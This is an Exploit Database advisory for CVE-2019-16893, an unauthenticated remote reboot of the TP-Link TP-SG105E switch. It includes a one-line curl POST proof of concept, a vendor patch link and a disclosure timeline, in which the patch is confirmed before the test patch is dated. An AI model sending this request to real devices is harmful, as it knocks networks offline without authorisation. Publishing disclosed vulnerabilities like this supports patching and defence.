TP-Link TP-SG105E 1.0.0 – Unauthenticated Remote Reboot

• Exploit Database
• 21 阅读

• 作者： PCEumel
  日期： 2020-01-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47958/

• # Exploit Title: TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
  # Date: 2020-01-20
  # Exploit Author: PCEumel
  # Vendor Homepage: https://www.tp-link.com/
  # Software Link: https://www.tp-link.com/us/support/download/tl-sg105e/#Firmware
  # Version: TP-Link TP-SG105E V4
  # Tested on: TP-SG105E V4 1.0.0 Build 20181120
  # Patch from vendor : https://static.tp-link.com/2020/202001/20200120/TL-SG105Ev4.0_en_1.0.0_[20200119-rel.52079]_up.zip
  # CVE : CVE-2019-16893
  
  # TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot
  # The TP-Link TP-SG105E is a "5-Port Gigabit Easy Smart Switch".
  # It features a web front end and an application (Easy Smart Configuration Utility)
  # for easy configuration management.
  
  # The device does not properly restrict access to an internal API.
  # It is therefore possible to remotely reboot the device by sending a HTTP POST
  # request.
  
  ---
  
  # POC :
  curl -d "reboot_op=reboot" -X POST http://192.168.1.10/reboot.cgi
  
  ---
  
  Timeline :
  2019-09-16 | Vendor notified 
  2019-09-25 | Reply (they will patch it)
  2019-12-24 | First patch for testing
  2019-12-19 | Confirmed the functionality of the patch
  2020-01-14 | Public patch available